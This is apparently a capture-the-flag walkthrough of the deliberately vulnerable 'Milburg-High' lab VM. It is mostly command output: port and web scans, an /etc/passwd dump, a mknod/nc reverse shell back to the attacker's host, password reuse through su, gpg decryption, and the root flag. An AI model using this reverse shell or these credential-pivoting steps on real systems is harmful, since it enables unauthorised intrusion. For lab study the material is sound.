1
2
3
4
5
6
7
8

$ nmap -sS 10.0.2.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 09:37 CST
Nmap scan report for 10.0.2.4
Host is up (0.000078s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:16:DC:1E (Oracle VirtualBox virtual NIC）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

$ nikto -h http://10.0.2.4/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.4
+ Target Hostname:    10.0.2.4
+ Target Port:        80
+ Start Time:         2019-04-16 09:40:28 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/dev_shell.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/lat_memo.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/passwords.html' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 591, size: 5669af30ee8f1, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ 7919 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-04-16 09:41:39 (GMT8) (71 seconds)
-------------------

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt❌104:65534::/nonexistent:/bin/false
Debian-exim❌105:109::/var/spool/exim4:/bin/false
rtkit❌106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq❌107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd❌108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus❌109:112::/var/run/dbus:/bin/false
usbmux❌110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher❌111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm❌112:116:Light Display Manager:/var/lib/lightdm:/bin/false
pulse❌113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi❌114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned❌115:121::/var/lib/saned:/bin/false
c0rruptedb1t❌1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob❌1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc❌1002:1002:James C,,,:/home/jc:/bin/bash
seb❌1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot❌1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd❌116:65534::/run/sshd:/usr/sbin/nologin
proftpd❌117:65534::/run/proftpd:/bin/false
ftp❌118:65534::/srv/ftp:/bin/false

1
2
3

nc -lvp 4443    ## 本地监听
echo|mknod /tmp/icekam p    ## 新建文件
echo|/bin/sh 0</tmp/icekam | /bin/nc 10.0.2.5 4443 1>/tmp/icekam   ## 反弹shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

10.0.2.4: inverse host lookup failed: Unknown host
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.4] 46400
python -c "import pty;pty.spawn('/bin/bash')"
www-data@Milburg-High:/var/www/html$ ls
ls
WIP.jpg        dev_shell.php.bak   lat_memo.html   robots.txt
about.html     dev_shell_back.png  login.html	   school_badge.png
contact.html   index.html	   news.html
dev_shell.php  index.html.bak	   passwords.html
www-data@Milburg-High:/var/www/html$

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

www-data@Milburg-High:/home$ cd elliot
cd elliot
www-data@Milburg-High:/home/elliot$ ls
ls
Desktop    Downloads  Pictures	Templates  theadminisdumb.txt
Documents  Music      Public	Videos
www-data@Milburg-High:/home/elliot$ cat theadminisdumb.txt
cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to

theadminisdumb

I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.
www-data@Milburg-High:/home/elliot$ 

1
2
3
4
5
6
7
8

www-data@Milburg-High:/home$ su jc
su jc
Password: Qwerty

jc@Milburg-High:/home$ id
id
uid=1002(jc) gid=1002(jc) groups=1002(jc),100(users)
jc@Milburg-High:/home$ 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

jc@Milburg-High:/home/bob$ ls -la
ls -la
total 172
drwxr-xr-x 18 bob  bob   4096 Mar  8  2018 .
drwxr-xr-x  6 root root  4096 Mar  4  2018 ..
-rw-------  1 bob  bob   6403 Mar  8  2018 .bash_history
-rw-r--r--  1 bob  bob    220 Feb 21  2018 .bash_logout
-rw-r--r--  1 bob  bob   3548 Mar  5  2018 .bashrc
drwxr-xr-x  7 bob  bob   4096 Feb 21  2018 .cache
drwx------  8 bob  bob   4096 Feb 27  2018 .config
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Desktop
-rw-r--r--  1 bob  bob     55 Feb 21  2018 .dmrc
drwxr-xr-x  3 bob  bob   4096 Mar  5  2018 Documents
drwxr-xr-x  3 bob  bob   4096 Mar  8  2018 Downloads
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 .ftp
drwx------  3 bob  bob   4096 Mar  5  2018 .gnupg
-rw-------  1 bob  bob   1980 Mar  8  2018 .ICEauthority
drwxr-xr-x  3 bob  bob   4096 Feb 21  2018 .local
drwx------  4 bob  bob   4096 Feb 21  2018 .mozilla
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Music
drwxr-xr-x  2 bob  bob   4096 Mar  4  2018 .nano
-rw-r--r--  1 bob  bob     72 Mar  5  2018 .old_passwordfile.html
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Pictures
-rw-r--r--  1 bob  bob    675 Feb 21  2018 .profile
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Public
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Templates
drwxr-xr-x  2 bob  bob   4096 Feb 21  2018 Videos
drwx------  2 bob  bob   4096 Mar  5  2018 .vnc
-rw-------  1 bob  bob    214 Mar  8  2018 .Xauthority
-rw-r--r--  1 bob  bob  25211 Mar  8  2018 .xfce4-session.verbose-log
-rw-r--r--  1 bob  bob  27563 Mar  7  2018 .xfce4-session.verbose-log.last
-rw-------  1 bob  bob   3672 Mar  8  2018 .xsession-errors
-rw-------  1 bob  bob   2866 Mar  7  2018 .xsession-errors.old
jc@Milburg-High:/home/bob$ ls
ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
jc@Milburg-High:/home/bob$ cd Documents
cd Documents
jc@Milburg-High:/home/bob/Documents$ ls -la
ls -la
total 20
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 .
drwxr-xr-x 18 bob bob 4096 Mar  8  2018 ..
-rw-r--r--  1 bob bob   91 Mar  5  2018 login.txt.gpg
drwxr-xr-x  3 bob bob 4096 Mar  5  2018 Secret
-rw-r--r--  1 bob bob  300 Mar  4  2018 staff.txt
jc@Milburg-High:/home/bob/Documents$ gpg –batch –passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
<passphrase HARPOCRATES -d login.txt.gpg bob:b0bcat_
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied.  Trying to guess what you mean ...
usage: gpg [options] [filename]

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

bob@Milburg-High:/$ su
su
Password: b0bcat_ 

root@Milburg-High:/## cd /
cd /
root@Milburg-High:/## ls
ls
bin   flag.txt	      lib	  mnt	run   tmp      vmlinuz.old
boot  home	      lib64	  opt	sbin  usr
dev   initrd.img      lost+found  proc	srv   var
etc   initrd.img.old  media	  root	sys   vmlinuz
root@Milburg-High:/## cat flag.txt
cat flag.txt
CONGRATS ON GAINING ROOT

        .-.
       (   )
        |~|       _.--._
        |~|~:'--~'      |
        | | :   #root   |
        | | :     _.--._|
        |~|~`'--~'
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
        | |
   _____|_|_________ Thanks for playing ~c0rruptedb1t